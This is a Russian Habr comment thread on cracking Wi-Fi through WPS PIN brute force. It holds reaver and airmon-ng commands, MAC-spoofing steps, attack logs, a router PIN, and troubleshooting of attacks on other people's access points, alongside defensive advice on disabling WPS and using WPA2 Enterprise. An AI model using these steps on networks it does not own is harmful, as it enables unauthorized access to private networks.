Comments 164
В домашних условиях эта уязвимость как-то не сильно пугает, все же и безлимитный пакет и информации подходящего содержания нету, кому нужны мои фотки… А вот что будут делать компании, у которых вай-фай очень активно используется это уже интересный вопрос.
P.S.: можно теперь будет сидеть в кафешках и не просить ключ от вай-фая, только долго сидеть придется, но для сильно жаждущих это, наверное, не будет проблемой
Ибо конфигурация по нажатию кнопки очень симпатична и относительно защищена необходимостью физического доступа к телу.
Так что пока, уже месяц как отключен WPS. Жду решений проблемы.
Хотя если верить Стивену Гибсону, просвета пока не видно.
— Added controls to enable or disable WPS.
— WPS functionality will be locked down for a specified time after multiple repeated WPS connection failures.
habrahabr.ru/post/139176/
Ну, разве что в том случае, если на всех сайтах, что вы сидите используется https. Но это не так, ведь вы на хабре :-)
Еще будучи студентом я в порыве альтруизма открыл всем одногруппникам доступ к своему пользователю на сервере Alpha (насколько я знаю, эти древние 64-битные монстры до сих пор там стоят, на них проводятся лабораторные), мол, берите мои программы, пользуйтесь сколько хотите, копируйте и т.п. Все было прекрасно до тех пор, пока один хороший, но отличающийся специфической логикой парень таки удалил все, до чего смог дотянуться.
я так предполагаю, что пин если отключить — вроде в dir-300 можно, то не проканает уже?
Не понимаю вообще, зачем WPS держать включенным постоянно.
фраза
Так что если ты являешься счастливым обладателем высокомощного адаптера от ALFA Network и антенны на пару десятков dBi, то не надейся, что получится поломать все пойманные точки доступа.
не должна читаться как
Так что если ты НЕ являешься счастливым обладателем высокомощного адаптера от ALFA Network и антенны на пару десятков dBi, то не надейся, что получится поломать все пойманные точки доступа.
Видел там кнопку настройки.
Нарыл тему в сети — blogs.computerworld.com/19551/wifi_routers_oldies_are_goodies
Вместо wps там стоит ses — (SES is a precursor to WPS. It has the push-button configuration but not the external registrar PIN feature so it is not vulnerable to having a PIN brute forced remotely.)
Возрадовался ))
При этом есть другая тема — superuser.com/questions/374624/how-do-i-configure-my-linksys-routers-to-resist-the-wps-brute-force-vulnerabilit, в которой новые роутеры — 5Гц-вые имеют этот самый wps.
И буржуи в теме еще с января…
Циска обещала отключить wps весной. НО воз и ныне там.
Правда у меня выдает подоброе — Все верно работает или нет?
[+] Sending WSC NACK
[+] Trying pin 77775672
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 77775672
[+] Sending EAPOL START request
[+] Received identity request
«мы круты, мы отключили Wps».
но поможет ли это? Нет, не всегда, проверено на нескольких роутерах.
да и на гугле есть тесты
docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0

-a -f -x 60 -S -v
. Пример:
reaver -i mon0 -b ssid_mac -a -f -x 60 -S -v
. Если кому-то нужны комментарии по параметрам, то могу написать.
А ещё для большей автоматизации «вспоминания пароля» рекомендую воспользоваться скриптом wifite.
Может плата Wi-Fi не такая.
Спасибо за статью! Интересно было бы почитать о других возможностях софта BackTrack для аудита. :)
Ответ: Возможно, ты спуфишь MAC виртуального интерфейса mon0, а это работать не будет. Надо указывать имя реального интерфейса, например, wlan0.
Так вот вопрос: я хочу поменять MAC на mon0, но это вообще не выходит. Я меняю адрес на wlan0 утилитой macchanger, потом запускаю airmon-ng. Стартует mon0.
На wlan0 — другой MAC на mon0 — оригинальный MAC-адрес с железки. Попытки сменить адрес на mon0 неуспешны — пишет, что устройство занято. Попытки прослушать эфир неуспешны: airmon ничего не показывает. Попытки reaver'ом сбрутить тоже неуспешны. Такое впечатление, что устройства рассогласовываются и ничего не работает вообще. Брутит только тогда, когда маки совпадают и являются оригинальными (то есть дефолтными).
Что-то я недопонимаю или неправильно делаю: поясните кто-нибудь как нормально спуфить мак, и как сделать чтобы все в итоге работало (имею ввиду чтобы брутер работал).
А так, кажется, все работает, только что-то на 17% брута точки с уровнем сигнала -87 оно зациклилось и массово вываливало фейлы транзакций.
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
Айродамп работает если так:
# ifconfig wlan0 down
# macchanger -r wlan0
# ifconfig wlan0 up
# airmon-ng start wlan0
# ifconfig mon0 down
# macchanger -r mon0
# ifconfig mon0 up
Да, айродамп работает. Но reaver при подключению к каналу жертвы после долгого простоя пишет чтото типа Failed to associate with essid… Не знаю с чем это связано: может быть потому что дневное время суток, может еще с чем-то. Хз, попробую еще сегодня ночью.
Да и вообще, заметил что скорость брута днем резко падает. Очень резко. Не знаю, может это у меня так.
И да, у меня чипсет бродкомавский, дрова bm43.
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 11
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[!] WARNING: Failed to associate with xx:xx:xx:xx:xx:xx (ESSID: wi-fi-dom)
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: wi-fi-dom)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
у меня на разные роутеры одинаково — failed (code: 0x02) или вообще не работает
Подскажите пожалуйста куда копать?
[!] WARNING: Failed to associate with 00:00:9C:D7:00:00 (ESSID: linksys)
Конечно до конца (10 часов) я не ждал, посмотрел лишь начнет ли подбирать. А полностью дождался пароля только на своей точке. Т.е. могу сказать, что у меня все сработало хорошо.
Тестил не на backtrack, а на Arch.
Хотел подписаться на журнал, но у вас нет ни возможности самовывоза, ни доставки курьером в Санкт-Петербурге. А ходить на почту как-то не очень интересно. Сделайте, пожалуйста, пункт самовывоза в нашем замечательном «небольшом» городе.
«Хакеры», 95-й год.
История повторяется.
$ svn checkout reaver-wps.googlecode.com/svn/trunk/ reaver-wps
на
$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps
У меня ubuntu-подобные дистрибутивы отказываются кушать линк без http.
Записанный при помощи unetbootin на флэшку дистрибутив не загружается с флэшки (пробовал R1 и R5).
Записанный на cd образ грузится, но в нём не работает мышь.
У DIR-300 11662587
Прочитал статью, возник вопрос, на сколько безопасно будет мое решение:
У меня самодельный роутер, на борту Debian 9, WiFi рулится через hostapd
Во-первых, думаю отключить вообще авторизацию по паролю, оставить только wps
Во-вторых, сделать одноразовые пинкоды с привязкой к мак адресу и ограниченым сроком жизни.
Генерить пинкоды будет самописная тулза с помощью крипторандома, а выдавать их буду через вебморду, которая смотрит только в локалку, то есть чтоб подключить новый девайс нужно иметь уже подключенный девайс по WiFi или витухе.
Позже еще думаю добавить возможность авторизации через NFC-метку (приложил смартфон — получил доступ)
Вопросы следующие:
- Насколько в целом безопасно такое решение?
- Нужен ли https для вебморды выдающей пинкоды или будет достаточно шифрования wpa2?
- Какое максмальное время жизни пинкода можно ставить при таком подходе?
почитал про WPA2 Enterprise, и мне оно показалось слишком замороченным для домашней сетки.
А цель-то какова?
Обезопасить домашнюю сеть от посторонних, при этом иметь возможность дать доступ гостям, а при необходимости иметь возможность отозвать доступ для конкретного девайса.
WPA2 Enterprise можно малой кровью настроить даже на OpenWRT (включая размещение на нём радиус-сервера). Взамен вы получаете уверенность, что у всех свои ключи; подключение к домашней точке доступа — это подключение именно к ней, а не к точке, которая ей прикидывается.
По остальным особенностям вашей схемы:
отключить вообще авторизацию по паролю, оставить только wpsВ WPA2-PSK нет пароля, там есть общий ключ. Разница в том, что он не только используется для аутентификации, но и для выведения ключевого материала для шифрования. Он может состоять из непечатаемых символов, но тем не менее он есть всегда. WPS PIN это просто один из способов его забить в клиентское устройство.
одноразовые пинкодыWPS PIN не ломал только ленивый reaver-ом.
привязкой к мак адресумак-адреса все видны в эфире, ничего не стоит задать такой же
В общем, ваше решение не рабочее, так как клиент, однажды получивший PSK, знает его постоянно. Ужимки с мак-адресами ситуацию не спасают. Наличие WPS PIN в этой схеме всё делает лишь катастрофически хуже, чем даже если бы вы просто использовали самую простую конфигурацию без WPS.
На практике гораздо проще иметь отдельную гостевую сеть, в которой менять PSK раз в сутки, например. Можно его выводить куда-то на видное место.
Если всё же решитесь идти до конца и настроить WPA2 Enterprise, то порекомендую режим аутентификации EAP-TLS, потому что:
- Всё равно придётся загружать сертификаты на устройство, чтобы проверить подлинность ТД. А так можно сразу одним бандлом и клиентский сертификат поставить.
- Можно выписывать сертификаты на определённый срок доступа.
- Валидатору (точке доступа) не нужно тогда иметь доступ к базе пользователей — сертификат можно проверить по факту подписи им.
Взломать Wi-Fi за 10 часов